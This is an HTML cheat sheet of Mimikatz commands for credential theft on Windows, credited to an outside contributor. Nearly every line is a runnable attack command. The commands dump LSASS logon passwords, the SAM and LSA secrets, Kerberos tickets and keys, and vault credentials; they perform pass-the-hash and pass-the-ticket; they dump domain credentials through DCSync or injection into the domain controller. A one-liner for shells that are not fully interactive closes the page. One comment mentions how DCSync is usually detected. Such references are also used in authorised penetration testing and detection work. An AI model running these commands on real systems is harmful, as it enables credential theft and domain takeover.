mimikatz.html
<p><span style="font-size: 22px;"><span style="color: rgb(226, 80, 65); background-color: rgb(204, 204, 204);">Mimikatz.exe Cheat Sheet:</span> (thank you to @dw3113r for this cheatsheet)</span></p>
<p><span style="font-size: 22px;"><strong>#Dump LSASS: </strong></span></p>
<p><span style="font-size: 22px;">mimikatz privilege::debug </span></p>
<p><span style="font-size: 22px;">mimikatz token::elevate</span></p>
<p><span style="font-size: 22px;"> mimikatz sekurlsa::logonpasswords</span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#(Over) Pass The Hash </strong></span></p>
<p><span style="font-size: 22px;">mimikatz privilege::debug </span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::pth /user: /ntlm:<> /domain:</span></p>
<p><span style="font-size: 22px;"> </span></p>
<p><span style="font-size: 22px;"><strong>#List all available kerberos tickets in memory</strong></span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::tickets </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Dump local Terminal Services credentials</strong> </span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::tspkg </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Load an existing LSASS minidump file for offline parsing (sekurlsa::minidump reads a dump, it does not create one) </strong></span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::minidump c:\temp\lsass.dmp </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#List cached MasterKeys </strong></span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::dpapi </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#List local Kerberos AES Keys </strong></span></p>
<p><span style="font-size: 22px;">mimikatz sekurlsa::ekeys </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Dump SAM Database</strong></span></p>
<p><span style="font-size: 22px;">mimikatz lsadump::sam </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Dump SECRETS Database </strong></span></p>
<p><span style="font-size: 22px;">mimikatz lsadump::secrets </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Inject and dump the Domain Controller’s Credentials</strong></span></p>
<p><span style="font-size: 22px;">mimikatz privilege::debug </span></p>
<p><span style="font-size: 22px;">mimikatz token::elevate </span></p>
<p><span style="font-size: 22px;">mimikatz lsadump::lsa /inject </span></p>
<p><span style="font-size: 22px;"><br></span></p>
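<p><span style="font-size: 22px;"><strong>#Dump the Domain’s Credentials remotely via DCSync (directory replication), without touching the DC’s LSASS - requires replication rights, and replication requests coming from a non-DC host are the usual detection signal </strong></span></p>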
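<p><span style="font-size: 22px;">mimikatz lsadump::dcsync /domain: /all </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#List and Dump local kerberos credentials</strong></span></p>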
<p><span style="font-size: 22px;">mimikatz kerberos::list /dump </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#Pass The Ticket </strong></span></p>
<p><span style="font-size: 22px;">mimikatz kerberos::ptt </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#List TS/RDP sessions</strong> </span></p>
<p><span style="font-size: 22px;">mimikatz ts::sessions </span></p>
<p><span style="font-size: 22px;"><br></span></p>
<p><span style="font-size: 22px;"><strong>#List Vault credentials</strong></span></p>
<p><span style="font-size: 22px;">mimikatz vault::list</span></p>
<br>
<p><span style="font-size: 22px;"><strong>#One Liner Mimikatz - for when you do not have a fully interactive shell</strong></span></p>
<p><span style="font-size: 22px;"> .\mimikatz "privilege::debug" "sekurlsa::logonpasswords" exit</span></p>